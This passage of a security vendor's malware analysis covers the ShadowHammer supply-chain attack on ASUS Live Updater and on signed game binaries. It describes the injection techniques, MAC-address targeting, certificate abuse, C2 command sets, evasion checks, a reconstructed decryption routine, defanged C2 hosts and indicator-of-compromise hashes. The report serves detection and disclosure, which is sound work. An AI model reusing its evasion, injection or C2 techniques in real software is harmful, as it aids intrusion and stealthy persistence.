size and offset to the resource. Once copied to the heap memory, another hardcoded offset, specific to the executable, is used to start the backdoor. The offset points to a position-independent shellcode-style function that unwraps and runs the malicious code further. Some of the older samples revealed the project path via a PDB file reference: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb“. This suggests that the attackers had exclusively prepared the malicious payload for their target. A similar tactic of precise targeting has become a persistent property of these attackers. A look at the resource section used for carrying the malicious payload revealed that the attackers had decided not to change the file size of the ASUS Live Updater binary. They changed the resource contents and overwrote a tiny block of the code in the subject executable. The layout of that patched file is shown below. We managed to find the original ASUS Live Updater executable which had been patched and abused by the attackers. As a result, we were able to recover the overwritten data in the resource section. The file we found was digitally signed and certainly had no infection present. Both the legitimate ASUS executable and the resource-embedded updater binary contain timestamps from March 2015. Considering that the operation took place in 2018, this raises the following question: why did the attackers choose an old ASUS binary as the infection carrier? Another injection technique was found in more recent samples. Using that technique, the attackers patched the code inside the C runtime (CRT) library function “___crtExitProcess”. The malicious code executes a shellcode loader instead of the standard function “___crtCorExitProcess”: This way, the execution flow is passed to another address which is located at the end of the code section. The attackers used a small decryption routine that can fit into a block at the end of the code section, which has a series of zero bytes in the original executable. They used the same source executable file from ASUS (compiled in March 2015) for this new type of injection. The loader code copies another block of encrypted shellcode from the file’s resource section (of the type “EXE”) to a newly allocated memory block with read-write-execute attributes and decrypts it using a custom block-chaining XOR algorithm, where the first dword is the initial seed and the total size of the shellcode is stored at an offset of +8. We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018. ShadowHammer downloader The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. It has the following properties: MD5: 63f2fe96de336b6097806b22b5ab941a SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea File Size: 1’662’464 bytes File Type: PE32 executable (GUI) Intel 80386, for MS Windows Link Time: 2018.07.10 05:58:19 (GMT) The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so that the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010. The core function of this executable is in a subroutine which is called from WinMain, but also executed directly via a hardcoded offset from the code injected into ASUS Live Updater. The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs. In other words, the malware iterates through a table of hashes and compares them to the hashes of local adapters’ MAC hashes. This way, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the match entry as a parameter in the request to identify the victim. The server response is expected to be an executable shellcode, which is placed in newly allocated memory and started. Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries was changing, some of the entries were present in all of the tables. For all users whose MAC did not match expected values, the code would create an INI file located two directory levels above the current executable and named “idx.ini”. Three values were written into the INI file under the [IDX_FILE] section: [IDX_FILE] XXX_IDN=YYYY-MM-DD XXX_IDE=YYYY-MM-DD XXX_IDX=YYYY-MM-DD where YYYY-MM-DD is a date one week ahead of the current system date. The code injected by the attackers was discovered with over 57000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of the affected users around the world remains unknown. Digital signature abuse A lot of computer security software deployed today relies on integrity control of trusted executables. Digital signature verification is one such method. In this attack, the attackers managed to get their code signed with a certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed. First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints: 0ff067d801f7daeeae842e9fe5f610ea 05e6a0be5ac359c7ff11f4b467ab20fc The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (i.e. ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke these certificates. All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts. Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, “Certificate Validity Period”, which can help us to understand roughly the timeframe of the operation. Apparently, because the certificate that the attackers relied on expired in 2018 and therefore had to be reissued, they used two different certificates. Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA. The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for “Extended Validation” and provides for stricter requirements for the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate. This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know about all software with malware injection they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (i.e. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We have immediately notified ASUS about this and provided evidence as required. ASUS-related attack samples Using decrypted shellcode and through code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties: they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted they have a forgotten PDB path of “D:\C++\AsusShellCode\Release\AsusShellCode.pdb” the shellcode from all of these samples connects to the same C2: asushotfix[.]com all samples were compiled between June and July 2018 the samples have been detected on computers all around the globe The hashes of these related samples include: 322cb39bc049aa69136925137906d855 36dd195269979e01a29e37c488928497 7d9d29c1c03461608bcab930fef2f568 807d86da63f0db1fc746d1f0b05bc357 849a2b0dc80aeca3d175c139efe5221c 86A4CAC227078B9C95C560C8F0370BF0 98908ce6f80ecc48628c8d2bf5b2a50c a4b42c2c95d1f2ff12171a01c86cd64f b4abe604916c04fe3dd8b9cb3d501d3f eac3e3ece94bc84e922ec077efb15edd 128CECC59C91C0D0574BC1075FE7CB40 88777aacd5f16599547926a4c9202862 These files are dropped by larger setup files / installers, signed by an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea) valid from 2015-07-27 till 2018-08-01). The hashes of the larger installers/droppers include: 0f49621b06f2cdaac8850c6e9581a594 17a36ac3e31f3a18936552aff2c80249 At this point, we do not know how they were used in these attacks and whether they were delivered via a different mechanism. These files were located in a “TEMP” subfolder for ASUS Live Updater, so it is possible that the software downloaded these files directly. Locations where these files were detected include: asus\asus live update\temp\1\Setup.exe asus\asus live update\temp\2\Setup.exe asus\asus live update\temp\3\Setup.exe asus\asus live update\temp\5\Setup.exe asus\asus live update\temp\6\Setup.exe asus\asus live update\temp\9\Setup.exe Public reports of the attack While investigating this case, we were wondering how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came by a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message: The message claims to be a “ASUS Critical Update” notification, however, the item does not have a name or version number. Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal: The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded the ASUS Live Update itself, as opposed to the update it received from the Internet. Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018. In September 2018, another Reddit user, FabulaBerserko also posted a message about a suspicious ASUS Live update: Asus_USA replied to FabulaBerserko with the following message, suggesting he run a scan for viruses: In his message, the Reddit user FabulaBerserko talks about an update listed as critical, however without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB “AsusShellCode.pdb” have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018. Targets by MAC address We managed to crack all of the 600+ MAC address hashes and analyzed distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. It turns out that the distribution is uneven and certain vendors are a higher priority for the attackers. The chart below shows statistics we collected based on network adapter manufacturers’ names: Some of the MAC addresses included on the target list were rather popular, i.e. 00-50-56-C0-00-08 belongs to the VMWare virtual adapter VMNet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers used a secondary MAC address from the real Ethernet card, which would make targeting more precise. However, it tells us that one of the targeted users used VMWare, which is rather common for software engineers (in testing their software). Another popular MAC was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device shared the same MAC address. Interaction with ASUS The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all details of what was known about the attack and hoping for cooperation. The following is a timeline of the discovery of this supply-chain attack, together with ASUS interaction and reporting: 29-Jan-2019 – initial discovery of the compromised ASUS Live Updater 30-Jan-2019 – created preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei 31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected. 01-Feb-2019 – ASUS provides an archive of all ASUS Live Updater tools beginning from 2018. None of them were infected, and they were signed with different certificates. 14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack 20-Feb-2019 – update conf call with ASUS to provide newly found details about the attack 08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack 08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS. We appreciate a quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New Year). This helped us to confirm that the attack was in a deactivated stage and there was no immediate risk to new infections and gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users’ computers. Non-ASUS-related cases In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia. One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called “Infestation: Survivor Stories”. It is a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, “the game was panned by critics and is considered one of the worst video games of all time“. The game servers were taken offline on December 15, 2016.” The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title of “The War Z” and released by OP Productions which put it in the Steam store in December 2012. In April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public. It seems that certain videogame companies picked up this available code and started making their own versions of the game. One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web & IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website. The homepage of Innovative Extremist also listed Electronics Extreme as one of their partners. Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked. However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it. And now the game seems to be causing trouble again. We found at least three samples of Infestation signed by Electronics Extreme with a certificate that must be revoked again. We believe that a poorly maintained development environment, leaked source code, as well vulnerable production servers were at the core of the bad luck chasing this videogame. Ironically, this game about infestation brought only trouble and a serious infection to its developers. Several executable files from the popular FPS videogame PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as at early April, Zepetto seems to have stopped using the certificate at the end of February 2019. While some details about this case were announced in March 2019 by our colleagues at ESET, we have been working on this in parallel with ESET and uncovered some additional facts. All these cases involve digitally signed binaries from three vendors based in three different Asian countries. They are signed with different certificates and a unique chain of trust. What is common to these cases is the way the binaries were trojanized. The code injection happened through modification of commonly used functions such as CRT (C runtime), which is similar to ASUS case. However, the implementation is very different in the case of the videogame companies. In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation. Payload from non-ASUS-related cases The payload included into the compromised videogames is rather simple. First of all, it checks whether the process has administrative privileges. Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread with a malicious intent. The file contains a hardcoded miniconfig—an annotated example of the config is provided below. C2 URL: https://nw.infestexe[.]com/version/last.php Sleep time: 240000 Target Tag: warz Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe Apparently, the backdoor was specifically created for this target, which is confirmed by an internal tag (the previous name of the game is “The War Z”). If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed. It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution. After all checks are done, the malware gathers information about the system including: Network adapter MAC address System username System hostname and IP address Windows version CPU architecture Current host FQDN Domain name Current executable file name Drive ? volume name and serial number Screen resolution System default language ID This information is concatenated in one string using the following string template: “%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s”. Then the malware crafts a host identifier, which is made up of the C drive serial number string XOR-ed with the hardcoded string “*&b0i0rong2Y7un1” and encoded with the Base64 algorithm. Later on, the ? serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties. The malware uses HTTP for communication with a C2 server and crafts HTTP headers on its own. It uses the following hardcoded User-Agent string: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36” Interestingly, when the malware identifies the Windows version, it uses a long list: Microsoft Windows NT 4.0 Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows Me Microsoft Windows 2000e Microsoft Windows XP Microsoft Windows XP Professional x64 Edition Microsoft Windows Server 2003 Microsoft Windows Server 2003 R2 Microsoft Windows Vista Microsoft Windows Server 2008 Microsoft Windows 7 Microsoft Windows Server 2008 R2 Microsoft Windows 8 Microsoft Windows Server 2012 Microsoft Windows 8.1 Microsoft Windows Server 2012 R2 Microsoft Windows 10 Microsoft Windows Server 2016 The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute. The following commands were discovered: DownUrlFile – download URL data to file DownRunUrlFile – download URL data to file and execute it RunUrlBinInMem – download URL data and run as shellcode UnInstall – set registry flag to prevent malware start The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, and the files should be discoverable through forensic analysis. Similarities between the ASUS attack and the non-ASUS-related cases Although the ASUS case and the videogame industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes (in trojanized games) resembles the one used in the backdoored ASUS Updater tool. hash = 0 for c in string: hash = hash * 0x21 hash = hash + c return hash 1 2 3 4 5 hash = 0 for c in string: hash = hash * 0x21 hash = hash + c return hash hash = 0 for c in string: hash = hash * 0x83 hash = hash + c return hash & 0x7FFFFFFF 1 2 3 4 5 hash = 0 for c in string: hash = hash * 0x83 hash = hash + c return hash & 0x7FFFFFFF ASUS case Other cases Pseudocode of API hashing algorithm of ASUS vs. other cases Besides that, our behavior engine identified that ASUS and other related samples are some of the only cases where the IPHLPAPI.dll was used from within a shellcode embedded into a PE file. In the case of ASUS, the function GetAdaptersAddresses from the IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from the IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to remote C&C servers. ShadowPad connection While investigating this case, we worked with several companies that had been abused in this wave of supply chain attacks. Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect. Our analysis of the sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea) that was deployed by the attackers on the company’s internal network during the breach, revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017. The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer: The newly updated version of ShadowPad follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As with ShadowPad, the attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain. The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. Such online documents, which we extracted from several backdoors, were created by the same user under a name of Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson from Valve Corporation. These online documents contained an ASCII block of text marked as an RSA private key during the time of operation. We noticed that inside the private key, normally encoded with base64, there was an invalid character injection (the symbol “$”): The message between the two “$” characters in fact contained an encrypted second-stage C2 URL. We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018: Jul 31: UDP://103.19.3[.]17:443 Aug 13: UDP://103.19.3[.]17:443 Oct 08: UDP://103.19.3[.]17:443 Oct 09: UDP://103.19.3[.]17:443 Oct 22: UDP://117.16.142[.]9:443 Nov 20: HTTPS://23.236.77[.]177:443 Nov 21: UDP://117.16.142[.]9:443 Nov 22: UDP://117.16.142[.]9:443 Nov 23: UDP://117.16.142[.]9:443 Nov 27: UDP://117.16.142[.]9:443 Nov 27: HTTPS://103.19.3[.]44:443 Nov 27: TCP://103.19.3[.]44:443 Nov 27: UDP://103.19.3[.]44:1194 Nov 27: HTTPS://23.236.77[.]175:443 Nov 29: HTTPS://23.236.77[.]175:443 Nov 29: UDP://103.19.3[.]43:443 Nov 30: HTTPS://23.236.77[.]177:443 The IP address range 23.236.64.0-23.236.79.255 belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA. Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk university (konkuk.ac.kr). This IP address range has been previously reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university’s network to host their C2 infrastructure. The last one, 103.19.3[.]44, is located in Japan but seems to belong to another Chinese ISP known as “xTom Shanghai Limited”. Connected to via the IP address, the server displays an error page from Chinese web management software called BaoTa (“宝塔” in Chinese): PlugX connection While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms used in multiple malware samples, including many of PlugX. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (i.e. md5:5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012 if the compilation timestamp is anything to trust. Apparently, both pieces of code share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444), but also implement identical algorithms to decrypt data, summarized in the python function below. from ctypes import c_uint32 from struct import pack,unpack def decrypt(data): p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]; pos = 0 decdata = "" while pos < len(data): p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value decdata += chr( ( ord(data[pos]) ^ ( ( p1%256 + p2%256 + p3%256 + p4%256 ) % 256 ) ) ) pos += 1 return decdata 1 2 3 4 5 6 7 8 9 10 11 12 13 from ctypes import c_uint32 from struct import pack,unpack def decrypt(data): p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]; pos = 0 decdata = "" while pos < len(data): p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value decdata += chr( ( ord(data[pos]) ^ ( ( p1%256 + p2%256 + p3%256 + p4%256 ) % 256 ) ) ) pos += 1 return decdata <//pre> While this does not indicate a strong connection to PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with PlugX source code, and possibly compiled and used PlugX in some other attacks in the past. Compromising software developers All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file patched by an external malicious application, which implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via ASUS update servers, which was detected by Kaspersky Lab products. However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism, which comes from a trojanized development environment used by software coders in the organization. In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign. The attack is comprised of an infected Microsoft Incremental Linker, a malicious DLL module that gets loaded through the compromised linker. The malicious DLL then hooks the file open operation and redirects attempts to open a commonly used C++ runtime library during the process of static linking. The redirect destination is a malicious .lib file, which gets linked with the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies file redirection only if the name matches the hardcoded target file name. So, was it a developer from a videogame company that installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer’s machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wakeup call to all software developers. If your company produces software, you should ask yourself: Where does my development software come from? Is the delivery process (download) of IDE distributions secure? When did we last check the integrity of our development software? Other victims During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens to TCP port 80 on the target system and responds to a specific URL schema, registered with Windows HTTP Service API: http://+/requested.html. The malware responds to HTTP GET/POST requests using this schema and is not easy to discover, which can help it remain invisible for a long time. Based on the malware network behavior, we identified three further, previously unknown, victims, a videogame company, a conglomerate holding company and a pharmaceutical company, all based in South Korea, which responded with a confirmation to the malware protocol, indicating compromised servers. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is not widely used and is a custom one, we believe that the same threat actor or a related group are behind these further compromises. This expands the list of previously known usual targets. Conclusions While attacks on supply chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from compromising of digital certificates, but it raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism. Does it mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another line in their software building conveyor that additionally checks their software for potential malware injections even after the code is digitally signed. At this unprecedented scale of operations, it is still a mystery why attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers had collected the victims MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com. We will keep tracking the ShadowPad activities and inform you about new findings! Indicators of compromise C2 servers: 103.19.3[.]17 103.19.3[.]43 103.19.3[.]44 117.16.142[.]9 23.236.77[.]175 23.236.77[.]177 Malware samples and trojanized files: 02385ea5f8463a2845bfe362c6c659fa 915086d90596eb5903bcd5b02fd97e3e 04fb0ccf3ef309b1cd587f609ab0e81e 943db472b4fd0c43428bfc6542d11913 05eacf843b716294ea759823d8f4ab23 95b6adbcef914a4df092f4294473252f 063ff7cc1778e7073eacb5083738e6a2 98908ce6f80ecc48628c8d2bf5b2a50c 06c19cd73471f0db027ab9eb85edc607 9d86dff1a6b70bfdf44406417d3e068f 0e1cc8693478d84e0c5e9edb2dc8555c a17cb9df43b31bd3dad620559d434e53 0f49621b06f2cdaac8850c6e9581a594 a283d5dea22e061c4ab721959e8f4a24 128cecc59c91c0d0574bc1075fe7cb40 a4b42c2c95d1f2ff12171a01c86cd64f 17a36ac3e31f3a18936552aff2c80249 a76a1fbfd45ad562e815668972267c70 1a0752f14f89891655d746c07da4de01 a96226b8c5599e3391c7b111860dd654 1b95ac1443eb486924ac4d399371397c a9c750b7a3bbf975e69ef78850af0163 1d05380f3425d54e4ddfc4bacc21d90e aa15eb28292321b586c27d8401703494 1e091d725b72aed432a03a505b8d617e aac57bac5f849585ba265a6cd35fde67 2ffc4f0e240ff62a8703e87030a96e39 aafe680feae55bb6226ece175282f068 322cb39bc049aa69136925137906d855 abbb53e1b60ab7044dd379cf80042660 343ad9d459f4154d0d2de577519fb2d3 abbd7c949985748c353da68de9448538 36dd195269979e01a29e37c488928497 b042bc851cafd77e471fa0d90a082043 3c0a0e95ccedaaafb4b3f6fd514fd087 b044cd0f6aae371acf2e349ef78ab39e 496c224d10e1b39a22967a331f7de0a2 b257f366a9f5a065130d4dc99152ee10 4b8d5ae0ad5750233dc1589828da130b b4abe604916c04fe3dd8b9cb3d501d3f 4fb4c6da73a0a380c6797e9640d7fa00 b572925a7286355ac9ebb12a9fc0cc79 5220c683de5b01a70487dac2440e0ecb b96bd0bda90d3f28d3aa5a40816695ed 53886c6ebd47a251f11b44869f67163d c0116d877d048b1ba87c0de6fd7c3fb2 55a7aa5f0e52ba4d78c145811c830107 c778fc8e816061420c537db2617e0297 5855ce7c4a3167f0e006310eb1c76313 cdb0a09067877f30189811c7aea3f253 5b6cd0a85996a7d47a8e9f8011d4ad3f d07e6abebcf1f2119622c60ad0acf4fa 5eed18254d797ccea62d5b74d96b6795 d1ed421779c31df2a059fe0f91c24721 6186b317c8b6a9da3ca4c166e68883ea d4c4813b21556dd478315734e1c7ae54 63606c861a63a8c60edcd80923b18f96 dc15e578401ad9b8f72c4d60b79fdf0f 63f2fe96de336b6097806b22b5ab941a dca86d2a9eb6dc53f549860f103486a9 6ab5386b5ad294fc6ec4d5e47c9c2470 dd792f9185860e1464b4346254b2101b 6b38c772b2ffd7a7818780b29f51ccb2 e7dcfa8e75b0437975ce0b2cb123dc7b 6cf305a34a71b40c60722b2b47689220 e8db4206c2c12df7f61118173be22c89 6e94b8882fe5865df8c4d62d6cff5620 ea3b7770018a20fc7c4541c39ea271af 7d9d29c1c03461608bcab930fef2f568 eac3e3ece94bc84e922ec077efb15edd 807d86da63f0db1fc746d1f0b05bc357 ecf865c95a9bec46aa9b97060c0e317d 849a2b0dc80aeca3d175c139efe5221c ef43b55353a34be9e93160bb1768b1a6 8505484efde6a1009f90fa02ca42f011 f0ba34be0486037913e005605301f3ce 8578f0c7b0a14f129cc66ee236c58050 f2f879989d967e03b9ea0938399464ab 86a4cac227078b9c95c560c8f0370bf0 f4edc757e9917243ce513f22d0ccacf2 8756bafa7f0a9764311d52bc792009f9 f9d46bbffa1cbd106ab838ee0ccc5242 87a8930e88e9564a30288572b54faa46 fa83ffde24f149f9f6d1d8bc05c0e023 88777aacd5f16599547926a4c9202862 fa96e56e7c26515875214eec743d2db5 8baa46d0e0faa2c6a3f20aeda2556b18 fb1473e5423c8b82eb0e1a40a8baa118 8ef2d715f3a0a3d3ebc989b191682017 fcfab508663d9ce519b51f767e902806 092ae9ce61f6575344c424967bd79437 7f05d410dc0d1b0e7a3fcc6cdda7a2ff eb37c75369046fb1076450b3c34fb8ab Sursa: https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/